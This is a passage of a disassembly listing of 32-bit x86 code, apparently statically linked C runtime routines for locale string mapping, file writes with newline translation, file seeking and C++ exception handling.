push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_41BCD0
push 100h
push ebx
call dword_419054 ; LCMapStringW
test eax, eax
jz short loc_412F0A
mov dword_4C598C, esi
jmp short loc_412F1F
; ---------------------------------------------------------------------------
loc_412F0A: ; CODE XREF: sub_412ED1+2F�j
call dword_4190AC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_412F1F
mov dword_4C598C, 2
loc_412F1F: ; CODE XREF: sub_412ED1+14�j
; sub_412ED1+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_412F3F
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_412F2A: ; CODE XREF: sub_412ED1+61�j
dec ecx
cmp [eax], bl
jz short loc_412F37
inc eax
cmp ecx, ebx
jnz short loc_412F2A
or ecx, 0FFFFFFFFh
loc_412F37: ; CODE XREF: sub_412ED1+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_412F3F: ; CODE XREF: sub_412ED1+51�j
mov eax, dword_4C598C
cmp eax, 2
jz loc_413129
loc_412F4D: ; DATA XREF: .text:off_41B68C�o
cmp eax, ebx
jz loc_413129
cmp eax, 1
jnz loc_41315C
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_412F76
mov eax, dword_4C59A8
mov [ebp+arg_18], eax
loc_412F76: ; CODE XREF: sub_412ED1+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call dword_41913C ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41315C
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_412FE2
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_412FE2: ; CODE XREF: sub_412ED1+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_413003
lea eax, [esi+esi]
push eax
call sub_40E74F
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41315C
mov [ebp+var_20], 1
loc_413003: ; CODE XREF: sub_412ED1+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_41913C ; MultiByteToWideChar
test eax, eax
jz loc_413106
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_419054 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_413106
test byte ptr [ebp+arg_4+1], 4
jz short loc_413072
cmp [ebp+arg_14], ebx
jz loc_413106
cmp edi, [ebp+arg_14]
jg loc_413106
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_419054 ; LCMapStringW
jmp loc_413106
; ---------------------------------------------------------------------------
loc_413072: ; CODE XREF: sub_412ED1+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4130B0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_4130B0: ; CODE XREF: sub_412ED1+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_4130CD
lea eax, [edi+edi]
push eax
call sub_40E74F
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_413106
mov [ebp+var_24], 1
loc_4130CD: ; CODE XREF: sub_412ED1+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_419054 ; LCMapStringW
test eax, eax
jz short loc_413106
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_4130F0
push ebx
push ebx
jmp short loc_4130F6
; ---------------------------------------------------------------------------
loc_4130F0: ; CODE XREF: sub_412ED1+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4130F6: ; CODE XREF: sub_412ED1+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call dword_419058 ; WideCharToMultiByte
mov edi, eax
loc_413106: ; CODE XREF: sub_412ED1+149�j
; sub_412ED1+168�j ...
cmp [ebp+var_24], ebx
jz short loc_413114
push [ebp+var_30]
call sub_40E359
pop ecx
loc_413114: ; CODE XREF: sub_412ED1+238�j
cmp [ebp+var_20], ebx
jz short loc_413122
push [ebp+var_2C]
call sub_40E359
pop ecx
loc_413122: ; CODE XREF: sub_412ED1+246�j
mov eax, edi
jmp loc_413284
; ---------------------------------------------------------------------------
loc_413129: ; CODE XREF: sub_412ED1+76�j
; sub_412ED1+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41313E
mov eax, dword_4C5998
mov [ebp+arg_0], eax
loc_41313E: ; CODE XREF: sub_412ED1+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41314B
mov eax, dword_4C59A8
mov [ebp+arg_18], eax
loc_41314B: ; CODE XREF: sub_412ED1+270�j
push [ebp+arg_0]
call sub_415FE6
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_413163
loc_41315C: ; CODE XREF: sub_412ED1+87�j
; sub_412ED1+CD�j ...
xor eax, eax
jmp loc_413284
; ---------------------------------------------------------------------------
loc_413163: ; CODE XREF: sub_412ED1+289�j
cmp eax, [ebp+arg_18]
jz loc_41325A
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_41602F
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41315C
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41905C ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_413249
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_40D7B0
add esp, 0Ch
jmp short loc_4131DA
; ---------------------------------------------------------------------------
loc_4131CA: ; DATA XREF: .text:stru_41BCD8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4131CE: ; DATA XREF: .text:stru_41BCD8�o
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
xor ebx, ebx
xor edi, edi
loc_4131DA: ; CODE XREF: sub_412ED1+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_413205
push [ebp+var_40]
call sub_40E74F
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_413222
push [ebp+var_40]
push ebx
push edi
call sub_40D7B0
add esp, 0Ch
mov [ebp+var_38], 1
loc_413205: ; CODE XREF: sub_412ED1+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41905C ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_413226
loc_413222: ; CODE XREF: sub_412ED1+31E�j
xor esi, esi
jmp short loc_41324C
; ---------------------------------------------------------------------------
loc_413226: ; CODE XREF: sub_412ED1+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_41602F
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41324C
; ---------------------------------------------------------------------------
loc_413249: ; CODE XREF: sub_412ED1+2D0�j
mov esi, [ebp+var_48]
loc_41324C: ; CODE XREF: sub_412ED1+353�j
; sub_412ED1+376�j
cmp [ebp+var_38], ebx
jz short loc_413274
push edi
call sub_40E359
pop ecx
jmp short loc_413274
; ---------------------------------------------------------------------------
loc_41325A: ; CODE XREF: sub_412ED1+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41905C ; LCMapStringA
mov esi, eax
loc_413274: ; CODE XREF: sub_412ED1+37E�j
; sub_412ED1+387�j
cmp [ebp+var_34], ebx
jz short loc_413282
push [ebp+var_34]
call sub_40E359
pop ecx
loc_413282: ; CODE XREF: sub_412ED1+3A6�j
mov eax, esi
loc_413284: ; CODE XREF: sub_412ED1+253�j
; sub_412ED1+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_412ED1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41328D proc near ; CODE XREF: sub_40EB9E+40�p
; sub_410914+F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_4132AB
mov ecx, off_4214EC
movzx eax, word ptr [ecx+eax*2]
jmp short loc_413306
; ---------------------------------------------------------------------------
loc_4132AB: ; CODE XREF: sub_41328D+10�j
mov ecx, eax
sar ecx, 8
push esi
mov esi, off_4214EC
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4132D1
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], cl
pop eax
jmp short loc_4132DB
; ---------------------------------------------------------------------------
loc_4132D1: ; CODE XREF: sub_41328D+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_4132DB: ; CODE XREF: sub_41328D+42�j
push 1
push dword_4C5998
lea ecx, [ebp+arg_0+2]
push dword_4C59A8
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41512C
add esp, 1Ch
test eax, eax
jnz short loc_413302
leave
retn
; ---------------------------------------------------------------------------
loc_413302: ; CODE XREF: sub_41328D+71�j
movzx eax, word ptr [ebp+arg_0+2]
loc_413306: ; CODE XREF: sub_41328D+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41328D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41330B proc near ; CODE XREF: sub_40EC73+9F�p
; sub_40FA2B+98�p ...
var_41C = byte ptr -41Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 41Ch
mov eax, dword_421360
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
cmp ecx, dword_4C5DA0
push ebx
push esi
mov [ebp+var_4], eax
push edi
jnb loc_41349B
mov eax, ecx
sar eax, 5
lea ebx, ds:4C5DC0h[eax*4]
mov eax, [ebx]
mov esi, ecx
and esi, 1Fh
shl esi, 3
mov al, [eax+esi+4]
test al, 1
mov [ebp+var_18], ebx
jz loc_41349B
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_C], edi
mov [ebp+var_14], edi
jnz short loc_41336A
loc_413363: ; CODE XREF: sub_41330B+173�j
xor eax, eax
jmp loc_4134AF
; ---------------------------------------------------------------------------
loc_41336A: ; CODE XREF: sub_41330B+56�j
test al, 20h
jz short loc_41337B
push 2
push edi
push edi
push ecx
call sub_4161FE
add esp, 10h
loc_41337B: ; CODE XREF: sub_41330B+61�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_413437
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov [ebp+arg_0], edi
jbe loc_41346F
loc_41339B: ; CODE XREF: sub_41330B+102�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_41C]
loc_4133A7: ; CODE XREF: sub_41330B+C4�j
cmp ecx, [ebp+arg_8]
jnb short loc_4133D1
mov edx, [ebp+var_8]
inc [ebp+var_8]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_4133C2
inc [ebp+var_14]
mov byte ptr [eax], 0Dh
inc eax
inc edi
loc_4133C2: ; CODE XREF: sub_41330B+AD�j
mov ebx, [ebp+var_18]
mov [eax], dl
inc eax
inc edi
cmp edi, 400h
jl short loc_4133A7
loc_4133D1: ; CODE XREF: sub_41330B+9F�j
mov edi, eax
lea eax, [ebp+var_41C]
sub edi, eax
push 0
lea eax, [ebp+var_10]
push eax
push edi
lea eax, [ebp+var_41C]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_4190DC ; WriteFile
test eax, eax
jz short loc_413411
mov eax, [ebp+var_10]
add [ebp+var_C], eax
cmp eax, edi
jl short loc_41341A
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41339B
jmp short loc_41341C
; ---------------------------------------------------------------------------
loc_413411: ; CODE XREF: sub_41330B+EB�j
call dword_4190AC ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
loc_41341A: ; CODE XREF: sub_41330B+F5�j
xor edi, edi
loc_41341C: ; CODE XREF: sub_41330B+104�j
; sub_41330B+14C�j ...
mov eax, [ebp+var_C]
cmp eax, edi
jnz short loc_413496
cmp [ebp+arg_0], edi
jz short loc_41346F
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_413464
mov dword_4C5908, eax
jmp short loc_4134A2
; ---------------------------------------------------------------------------
loc_413437: ; CODE XREF: sub_41330B+78�j
push edi
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_4190DC ; WriteFile
test eax, eax
jz short loc_413459
mov eax, [ebp+var_10]
mov [ebp+arg_0], edi
mov [ebp+var_C], eax
jmp short loc_41341C
; ---------------------------------------------------------------------------
loc_413459: ; CODE XREF: sub_41330B+141�j
call dword_4190AC ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41341C
; ---------------------------------------------------------------------------
loc_413464: ; CODE XREF: sub_41330B+123�j
push [ebp+arg_0]
call sub_412BBA
pop ecx
jmp short loc_4134AC
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41330B+8A�j
; sub_41330B+11B�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_413484
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_413363
loc_413484: ; CODE XREF: sub_41330B+16B�j
mov dword_4C5904, 1Ch
mov dword_4C5908, edi
jmp short loc_4134AC
; ---------------------------------------------------------------------------
loc_413496: ; CODE XREF: sub_41330B+116�j
sub eax, [ebp+var_14]
jmp short loc_4134AF
; ---------------------------------------------------------------------------
loc_41349B: ; CODE XREF: sub_41330B+20�j
; sub_41330B+45�j
and dword_4C5908, 0
loc_4134A2: ; CODE XREF: sub_41330B+12A�j
mov dword_4C5904, 9
loc_4134AC: ; CODE XREF: sub_41330B+162�j
; sub_41330B+189�j
or eax, 0FFFFFFFFh
loc_4134AF: ; CODE XREF: sub_41330B+5A�j
; sub_41330B+18E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_411BA5
leave
retn
sub_41330B endp
; =============== S U B R O U T I N E =======================================
sub_4134BF proc near ; CODE XREF: sub_40ED7A+69�p
; sub_40FA2B+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
cmp eax, dword_4C5DA0
push ebx
push esi
push edi
jnb short loc_413533
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4C5DC0h[ecx*4]
mov ecx, [edi]
shl esi, 3
test byte ptr [ecx+esi+4], 1
jz short loc_413533
push eax
call sub_415FAA
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41353A
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword_419114 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_413517
call dword_4190AC ; RtlGetLastWin32Error
jmp short loc_413519
; ---------------------------------------------------------------------------
loc_413517: ; CODE XREF: sub_4134BF+4E�j
xor eax, eax
loc_413519: ; CODE XREF: sub_4134BF+56�j
test eax, eax
jz short loc_413526
push eax
call sub_412BBA
pop ecx
jmp short loc_413544
; ---------------------------------------------------------------------------
loc_413526: ; CODE XREF: sub_4134BF+5C�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, ebx
jmp short loc_413547
; ---------------------------------------------------------------------------
loc_413533: ; CODE XREF: sub_4134BF+D�j
; sub_4134BF+2A�j
and dword_4C5908, 0
loc_41353A: ; CODE XREF: sub_4134BF+36�j
mov dword_4C5904, 9
loc_413544: ; CODE XREF: sub_4134BF+65�j
or eax, 0FFFFFFFFh
loc_413547: ; CODE XREF: sub_4134BF+72�j
pop edi
pop esi
pop ebx
retn
sub_4134BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41354B proc near ; CODE XREF: sub_40ED7A+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_413567
mov [edi+4], ebx
loc_413567: ; CODE XREF: sub_41354B+17�j
push 1
push ebx
push esi
call sub_4134BF
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_4135E4
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41358C
sub eax, [edi+4]
jmp loc_41369F
; ---------------------------------------------------------------------------
loc_41358C: ; CODE XREF: sub_41354B+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_4135D6
mov edx, esi
sar edx, 5
mov edx, dword_4C5DC0[edx*4]
mov ebx, esi
and ebx, 1Fh
test byte ptr [edx+ebx*8+4], 80h
jz short loc_4135C8
mov edx, ecx
cmp edx, eax
jnb short loc_4135C8
loc_4135BB: ; CODE XREF: sub_41354B+7B�j
cmp byte ptr [edx], 0Ah
jnz short loc_4135C3
inc [ebp+var_8]
loc_4135C3: ; CODE XREF: sub_41354B+73�j
inc edx
cmp edx, [edi]
jb short loc_4135BB
loc_4135C8: ; CODE XREF: sub_41354B+68�j
; sub_41354B+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_4135EC
mov eax, [ebp+var_8]
jmp loc_41369F
; ---------------------------------------------------------------------------
loc_4135D6: ; CODE XREF: sub_41354B+50�j
test dl, dl
js short loc_4135C8
mov dword_4C5904, 16h
loc_4135E4: ; CODE XREF: sub_41354B+2D�j
or eax, 0FFFFFFFFh
jmp loc_41369F
; ---------------------------------------------------------------------------
loc_4135EC: ; CODE XREF: sub_41354B+81�j
test byte ptr [edi+0Ch], 1
jz loc_413697
mov edx, [edi+4]
test edx, edx
jnz short loc_413605
and [ebp+var_8], edx
jmp loc_413697
; ---------------------------------------------------------------------------
loc_413605: ; CODE XREF: sub_41354B+B0�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4C5DC0h[eax*4]
mov eax, [ebx]
shl esi, 3
test byte ptr [esi+eax+4], 80h
jz short loc_413691
push 2
push 0
push [ebp+var_C]
call sub_4134BF
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_413658
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_41364E
; ---------------------------------------------------------------------------
loc_413645: ; CODE XREF: sub_41354B+105�j
cmp byte ptr [eax], 0Ah
jnz short loc_41364D
inc [ebp+arg_0]
loc_41364D: ; CODE XREF: sub_41354B+FD�j
inc eax
loc_41364E: ; CODE XREF: sub_41354B+F8�j
cmp eax, ecx
jb short loc_413645
test byte ptr [edi+0Dh], 20h
jmp short loc_41368C
; ---------------------------------------------------------------------------
loc_413658: ; CODE XREF: sub_41354B+EE�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_4134BF
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41367F
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41367F
test ch, 4
jz short loc_413682
loc_41367F: ; CODE XREF: sub_41354B+125�j
; sub_41354B+12D�j
mov eax, [edi+18h]
loc_413682: ; CODE XREF: sub_41354B+132�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41368C: ; CODE XREF: sub_41354B+10B�j
jz short loc_413691
inc [ebp+arg_0]
loc_413691: ; CODE XREF: sub_41354B+DA�j
; sub_41354B:loc_41368C�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_413697: ; CODE XREF: sub_41354B+A5�j
; sub_41354B+B5�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41369F: ; CODE XREF: sub_41354B+3C�j
; sub_41354B+86�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41354B endp
; =============== S U B R O U T I N E =======================================
sub_4136A4 proc near ; CODE XREF: sub_413C66+12D�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_4136EF
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_4136EF
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_4136CA
add ecx, 8
push ecx
push edx
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_4136EC
loc_4136CA: ; CODE XREF: sub_4136A4+14�j
test byte ptr [edi], 2
jz short loc_4136D4
test byte ptr [esi], 8
jz short loc_4136EC
loc_4136D4: ; CODE XREF: sub_4136A4+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_4136E3
test byte ptr [esi], 1
jz short loc_4136EC
loc_4136E3: ; CODE XREF: sub_4136A4+38�j
test al, 2
jz short loc_4136EF
test byte ptr [esi], 2
jnz short loc_4136EF
loc_4136EC: ; CODE XREF: sub_4136A4+24�j
; sub_4136A4+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4136EF: ; CODE XREF: sub_4136A4+5�j
; sub_4136A4+D�j ...
xor eax, eax
inc eax
retn
sub_4136A4 endp
; =============== S U B R O U T I N E =======================================
sub_4136F3 proc near ; CODE XREF: sub_41370C+70�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_413700
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_413700: ; CODE XREF: sub_4136F3+8�j
and dword_4C59B8, 0
jmp sub_413EDF
sub_4136F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41370C proc near ; CODE XREF: sub_41382B+10C�p
; sub_413B3D+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_41C110
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
inc dword_4C59B8
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41372E: ; CODE XREF: sub_41370C+89�j
cmp esi, [ebp+arg_C]
jz short loc_413797
cmp esi, 0FFFFFFFFh
jle short loc_41373D
cmp esi, [edi+4]
jl short loc_413742
loc_41373D: ; CODE XREF: sub_41370C+2A�j
call sub_413F0C
loc_413742: ; CODE XREF: sub_41370C+2F�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_413773
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_413F40
loc_413773: ; CODE XREF: sub_41370C+50�j
and [ebp+ms_exc.disabled], 0
jmp short loc_413792
; ---------------------------------------------------------------------------
loc_413779: ; DATA XREF: .text:0041C120�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_4136F3
retn
; ---------------------------------------------------------------------------
loc_413782: ; DATA XREF: .text:0041C124�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_413792: ; CODE XREF: sub_41370C+6B�j
mov [ebp+var_1C], esi
jmp short loc_41372E
; ---------------------------------------------------------------------------
loc_413797: ; CODE XREF: sub_41370C+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4137B9
cmp esi, [ebp+arg_C]
jz short loc_4137AA
call sub_413F0C
loc_4137AA: ; CODE XREF: sub_41370C+97�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41370C endp
; =============== S U B R O U T I N E =======================================
sub_4137B3 proc near ; DATA XREF: .text:stru_41C110�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_4137B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4137B9 proc near ; CODE XREF: sub_41370C+8F�p
cmp dword_4C59B8, 0
jle short locret_4137C8
dec dword_4C59B8
locret_4137C8: ; CODE XREF: sub_4137B9+7�j
retn
sub_4137B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137C9 proc near ; CODE XREF: sub_413963+56�p
; sub_413C66+19D�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_41C128
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_4137F7
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_4137F7
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_40EE38
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_4137F7: ; CODE XREF: sub_4137C9+11�j
; sub_4137C9+1B�j
call __SEH_epilog
retn
sub_4137C9 endp
; =============== S U B R O U T I N E =======================================
sub_4137FD proc near ; DATA XREF: .text:stru_41C128�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_4137FD endp
; ---------------------------------------------------------------------------
loc_413806: ; DATA XREF: .text:stru_41C128�o
mov esp, [ebp-18h]
jmp sub_413EDF
; =============== S U B R O U T I N E =======================================
sub_41380E proc near ; CODE XREF: sub_4139C1+7C�p
; sub_4139C1+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_413829
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_413829: ; CODE XREF: sub_41380E+C�j
pop esi
retn
sub_41380E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41382B proc near ; CODE XREF: sub_413B3D+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041395A SIZE 00000003 BYTES
push 40h
push offset stru_41C138
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_40EFD6
pop ecx
pop ecx
mov [ebp+var_30], eax
mov eax, dword_4C59B0
mov [ebp+var_34], eax
mov eax, dword_4C59B4
mov [ebp+var_38], eax
mov dword_4C59B0, esi
mov eax, [ebp+arg_8]
mov dword_4C59B4, eax
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40F043
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_413948
